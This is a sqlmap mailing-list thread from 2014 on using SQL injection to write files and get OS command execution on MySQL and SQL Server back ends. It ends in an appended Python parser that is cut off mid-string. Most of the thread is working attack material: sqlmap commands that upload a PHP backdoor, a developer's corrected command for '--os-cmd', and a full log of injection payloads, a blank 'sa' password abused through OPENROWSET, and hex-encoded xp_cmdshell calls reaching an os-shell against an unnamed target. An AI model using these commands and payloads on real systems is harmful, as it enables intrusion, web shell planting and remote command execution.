> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949) |
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 12:02:19
|
On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> wrote:
> [...]
> All in all, can you please relaunch sqlmap (make sure you run git pull
> first to sync to the GitHub repository) with the following syntax:

Command line:

python sqlmap.py -u "http://172.16.71.138:7879/index.php" --data="act=auth-login&pag=login&username=admin&password=admin" -p username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 --parse-errors -t traffic.log --answers "language does the web server support=4,do you want to use for writable=2,comma separate list of absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"

Feel free to report back the result, the entire standard output of sqlmap and send me the traffic.log.

Thank you.

Bernardo |
From: Bernardo D. A. G. <ber...@gm...> - 2014-03-21 11:57:34
|
Hi Brian,

We do use INTO DUMPFILE to write files on the file system when the database is MySQL. This works if the stacked queries (nested queries) SQLi technique is supported, which is not the case against a PHP application with a MySQL back-end. When stacked queries are not possible and the back-end is MySQL, sqlmap falls back to the UNION SQLi technique with the same INTO DUMPFILE clause to write the file to the file system.

When you instruct sqlmap to take over the OS and no stacked queries are supported, then if the back-end is MySQL again, it will try to upload a web shell to a writable folder within the web server's document root directory - this is achieved with the technique explained above or, better, with LINES TERMINATED BY, used to terminate the original SQL statement with the file stager injected by sqlmap, dumped to the file on the file system and used to upload the web shell.

I have checked the Metasploit exploit source code, line 150, and I see it uses the boolean-based SQL injection technique to upload the file - that is not yet supported by sqlmap. We will look into implementing this; I've created a ticket for that, https://github.com/sqlmapproject/sqlmap/issues/647.

According to the exploit, the request method is POST, so your syntax should reflect that: -u "http://172.16.71.138:7879/index.php" --data="act=auth-login&pag=login&username=admin&password=admin" - GET and POST verbs are not necessarily interchangeable by the application.

Also, I notice you provide your own web shell - you can let sqlmap use its own with --os-cmd, --os-shell or --os-pwn. When prompted with a question about the language, stick to PHP; then sqlmap asks what the writable directory is, select 2 and provide your application one, "C:/Progra~1/Cyclope/ni4zlja/", and let sqlmap do its thing.
All in all, can you please relaunch sqlmap (make sure you run git pull first to sync to the GitHub repository) with the following syntax:

Bernardo

On 21 March 2014 09:42, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> --file-write requires union or stacked techniques to be available. In the case
> of --os-shell we also use the INTO OUTFILE technique, which is pretty dirty (in
> most cases you can expect original results appearing in the first couple
> of lines). Option --file-write in our case should produce a "clean" file.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hu...> wrote:
>>
>> Hello Everyone,
>>
>> I'm attempting to use sqlmap to exploit a local installation of some
>> software. I know it's vulnerable because it's on exploit-db & metasploit
>> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
>> limited success with sqlmap, but I'm at the final stage now where I'm trying
>> to use the sqli's I've found to upload a webshell via sqlmap. No
>> dice....I'm getting an error stating "[ERROR] none of the SQL injection
>> techniques detected can be used to write files to the underlying file system
>> of the back-end MySQL server." Other than the obvious, I'm not sure what
>> this means because --os-shell and --os-cmd upload a file and execute just
>> fine. Does --file-write need something special? Here's the output:
>>
>> root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3
>>
>> ...
>> [*] starting at 23:13:08
>>
>> [23:13:08] [DEBUG] cleaning up configuration parameters
>> [23:13:08] [DEBUG] setting the HTTP timeout
>> [23:13:08] [DEBUG] setting the HTTP method to GET
>> [23:13:08] [DEBUG] creating HTTP requests opener object
>> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value
>> [23:13:08] [DEBUG] setting the write file functionality
>> [23:13:08] [INFO] testing connection to the target URL
>> [23:13:08] [DEBUG] declared web page charset 'utf-8'
>> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
>> ---
>> Place: GET
>> Parameter: username
>>     Type: boolean-based blind
>>     Title: AND boolean-based blind - WHERE or HAVING clause
>>     Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin
>>     Vector: AND [INFERENCE]
>>
>>     Type: AND/OR time-based blind
>>     Title: MySQL > 5.0.11 AND time-based blind
>>     Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin
>>     Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>> ---
>> [23:13:08] [INFO] testing MySQL
>> [23:13:08] [INFO] confirming MySQL
>> [23:13:08] [INFO] the back-end DBMS is MySQL
>> web server operating system: Windows
>> web application technology: PHP 5.3.1, Apache 2.2.14
>> back-end DBMS: MySQL >= 5.0.0
>> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system
>> [23:13:08] [INFO] the back-end DBMS operating system is Windows
>> [23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
>> [23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138'
>>
>> [*] shutting down at 23:13:08
>>
>>
>> The results are the same when the cmdline is changed up for a POST version:
>>
>> root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3
>>
>> Any thoughts on what may be happening here would be much appreciated.
>>
>> Thanks,
>>
>> Brian
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
From: Miroslav S. <mir...@gm...> - 2014-03-21 09:42:33
|
Hi.

--file-write requires union or stacked techniques to be available. In the case of --os-shell we also use the INTO OUTFILE technique, which is pretty dirty (in most cases you can expect original results appearing in the first couple of lines). Option --file-write in our case should produce a "clean" file.

Kind regards,
Miroslav Stampar


On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hu...> wrote:
> Hello Everyone,
>
> I'm attempting to use sqlmap to exploit a local installation of some
> software. I know it's vulnerable because it's on exploit-db & metasploit
> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
> limited success with sqlmap, but I'm at the final stage now where I'm
> trying to use the sqli's I've found to upload a webshell via sqlmap. No
> dice....I'm getting an error stating "[ERROR] none of the SQL injection
> techniques detected can be used to write files to the underlying file
> system of the back-end MySQL server." Other than the obvious, I'm not sure
> what this means because --os-shell and --os-cmd upload a file and execute
> just fine. Does --file-write need something special? Here's the output:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> ...
> [*] starting at 23:13:08
>
> [23:13:08] [DEBUG] cleaning up configuration parameters
> [23:13:08] [DEBUG] setting the HTTP timeout
> [23:13:08] [DEBUG] setting the HTTP method to GET
> [23:13:08] [DEBUG] creating HTTP requests opener object
> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value
> [23:13:08] [DEBUG] setting the write file functionality
> [23:13:08] [INFO] testing connection to the target URL
> [23:13:08] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: username
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin
>     Vector: AND [INFERENCE]
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin
>     Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
> ---
> [23:13:08] [INFO] testing MySQL
> [23:13:08] [INFO] confirming MySQL
> [23:13:08] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL >= 5.0.0
> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system
> [23:13:08] [INFO] the back-end DBMS operating system is Windows
> [23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
> [23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138'
>
> [*] shutting down at 23:13:08
>
>
> The results are the same when the cmdline is changed up for a POST version:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> Any thoughts on what may be happening here would be much appreciated.
>
> Thanks,
>
> Brian

--
Miroslav Stampar
http://about.me/stamparm |
From: Daniel S. <don...@gm...> - 2014-03-21 08:09:32
|
Hey,

I am trying to write on MSSQL with either --os-shell or any other flag (none works for me).

I know that 'Ad Hoc Distributed Queries' are disabled -> OpenRowSet is disabled as well.

sqlmap initially gets into the DB as a secondary user. There are 2 users in the DB: SA, which is the administrator, and the other user, which sqlmap gets at start. The password for sa is NULL - no password at all; I know that by executing --users --passwords.

So with all this data I am trying to run:

sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o --os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t traffic.txt --sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql

I also tried without the sql-file, as I guess sqlmap should try it by itself, but I get the same results.

So my guess is that sqlmap can't get into the 'sa' user, because if it could get in, it would enable the OpenRowSet. Am I right?

I can send the traffic.txt privately.

**********************

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb
    Vector: AND [INFERENCE]

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7343=7343) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE 'PGJx
    Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keyword=f'); WAITFOR DELAY '0:0:5'--
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keyword=f') WAITFOR DELAY '0:0:5'--
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[03:57:43] [INFO] executing SQL statements from given file(s)
[03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file '/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql'
do you want to provide the substitution values? [y/N] y
insert value for variable 'ENABLE': 1
[03:57:46] [DEBUG] executing SQL data execution query: 'EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH OVERRIDE'
[03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced options', 0; RECONFIGURE WITH OVERRIDE--
[03:57:46] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:57:53] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[03:57:53] [DEBUG] done EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH OVERRIDE: 'NULL'
[03:57:53] [DEBUG] going to use D:/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory
on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by default. This function is needed to execute statements as another DBMS user since you provided the option '--dbms-creds'. If you are DBA, you can enable it. Do you want to enable it? [Y/n] Y
[03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced options', 0; RECONFIGURE WITH OVERRIDE--
[03:59:06] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[03:59:06] [INFO] testing if current user is DBA
[03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE 'FSjT
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value 'qsgjq0qywuq' to data type int.'
[03:59:06] [DEBUG] performed 1 queries in 0.13 seconds
[03:59:06] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
[03:59:06] [DEBUG] creating a support table to write commands standard output to
[03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable
[03:59:06] [PAYLOAD] f');SELECT * FROM OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg VARCHAR(8000);SET @ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC master..xp_cmdshell @ktdg')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'Ad Hoc Distributed Queries' by using sp_configure. For more information about enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in SQL Server Books Online.'
[03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW', FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:06] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: You do not have permission to use the bulk load statement.'
[03:59:06] [PAYLOAD] f');SELECT * FROM OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw VARCHAR(8000);SET @wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC master..xp_cmdshell @wgiw')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'Ad Hoc Distributed Queries' by using sp_configure. For more information about enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in SQL Server Books Online.'
[03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('tzMl' LIKE 'tzMl
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'qsgjq0qywuq' to data type int.'
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>54 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>56 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>57 AND ('EirG' LIKE 'EirG
[03:59:07] [INFO] retrieved:
[03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
[03:59:07] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY '0:0:5'--
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY '0:0:5'--
[03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:08] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY '0:0:5'--
[03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:13] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY '0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY '0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY '0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY '0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY '0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[04:00:40] [INFO] retrieved: 0
[04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
[04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message: 'System.NullReferenceException: Object reference not set to an instance of an object.'
[04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output within the back-end file system does not have writing permissions for the DBMS process. You are advised to manually adjust it with option --tmp-path switch or you will not be able to retrieve the commands output
[04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> x |
From: Brian O. <br...@hu...> - 2014-03-21 03:44:51
|
Hello Everyone,

I'm attempting to use sqlmap to exploit a local installation of some software. I know it's vulnerable because it's on exploit-db & metasploit pops it every time (http://www.exploit-db.com/exploits/20501/).

I've had limited success with sqlmap, but I'm at the final stage now where I'm trying to use the sqli's I've found to upload a webshell via sqlmap. No dice.... I'm getting an error stating "[ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server." Other than the obvious, I'm not sure what this means because --os-shell and --os-cmd upload a file and execute just fine. Does --file-write need something special?

Here's the output:

root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3
...
[*] starting at 23:13:08

[23:13:08] [DEBUG] cleaning up configuration parameters
[23:13:08] [DEBUG] setting the HTTP timeout
[23:13:08] [DEBUG] setting the HTTP method to GET
[23:13:08] [DEBUG] creating HTTP requests opener object
[23:13:08] [DEBUG] forcing back-end DBMS to user defined value
[23:13:08] [DEBUG] setting the write file functionality
[23:13:08] [INFO] testing connection to the target URL
[23:13:08] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[23:13:08] [INFO] testing MySQL
[23:13:08] [INFO] confirming MySQL
[23:13:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[23:13:08] [INFO] fingerprinting the back-end DBMS operating system
[23:13:08] [INFO] the back-end DBMS operating system is Windows
[23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138'

[*] shutting down at 23:13:08

The results are the same when the cmdline is changed up for a POST version:

root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3

Any thoughts on what may be happening here would be much appreciated.

Thanks,
Brian
|
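An added example for the question above (my code, not Brian's and not sqlmap's own). The error is sqlmap spelling out what its MySQL file write needs: as I read `plugins/generic/filesystem.py`, `--file-write` is only attempted when the detected techniques include UNION query or stacked queries, because the write is a `SELECT ... INTO DUMPFILE` that the attacker has to run as a complete statement of their own. Boolean-based and time-based blind injection, the only two techniques sqlmap found on `username`, answer one true/false question per request and cannot do that. `--os-shell` gets away with it because, again as I read sqlmap's `lib/takeover/web.py`, its web-stager upload on MySQL takes a different route (`LIMIT 0,1 INTO OUTFILE '...' LINES TERMINATED BY 0x...` appended to the application's own query), which needs neither UNION nor stacking. The script below parses the "injection points" block sqlmap prints and reports, per parameter, whether a write-capable technique is present. The block from the post is embedded verbatim; the second block, with a UNION technique, is constructed to show the other outcome. The technique-to-capability mapping is my assumption about sqlmap's behaviour and is marked as such in the code.

```python
import re
from dataclasses import dataclass, field

# Techniques, spelled as sqlmap prints them on its "Type:" lines, that hand
# the attacker a complete SELECT of their own. Assumption (mine): that is
# what sqlmap's MySQL file write (SELECT ... INTO DUMPFILE) requires, so a
# parameter with only blind techniques cannot serve --file-write.
WRITE_CAPABLE = {"UNION query", "stacked queries"}


@dataclass
class InjectionPoint:
    place: str                                        # GET, POST, Cookie, ...
    parameter: str
    techniques: list = field(default_factory=list)    # [(type, title, payload), ...]

    def can_write_file(self):
        return any(kind in WRITE_CAPABLE for kind, _, _ in self.techniques)


# "Parameter: username" (2014-era layout with a separate "Place:" line) or
# the newer "Parameter: username (GET)" form.
_PARAM_RE = re.compile(r"^Parameter:\s*(\S+?)(?:\s+\((\w+)\))?$")


def parse_injection_points(output):
    """Parse the block sqlmap prints between the '---' separator lines."""
    points, current, place, pending = [], None, None, {}
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Place:"):
            place = line.split(":", 1)[1].strip()
        elif line.startswith("Parameter:"):
            m = _PARAM_RE.match(line)
            if not m:
                continue
            current = InjectionPoint(m.group(2) or place or "?", m.group(1))
            points.append(current)
        elif line.startswith("Type:") and current is not None:
            pending = {"type": line.split(":", 1)[1].strip()}
        elif line.startswith("Title:") and pending:
            pending["title"] = line.split(":", 1)[1].strip()
        elif line.startswith("Payload:") and pending:
            payload = line.split(":", 1)[1].strip()
            current.techniques.append((pending["type"], pending.get("title", ""), payload))
            pending = {}
    return points


def file_write_report(output):
    """Map 'PLACE:parameter' to whether sqlmap could use it to write a file."""
    return {f"{p.place}:{p.parameter}": p.can_write_file()
            for p in parse_injection_points(output)}


# Block copied from the post above: boolean-based and time-based blind only.
POSTED_BLOCK = """\
---
Place: GET
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
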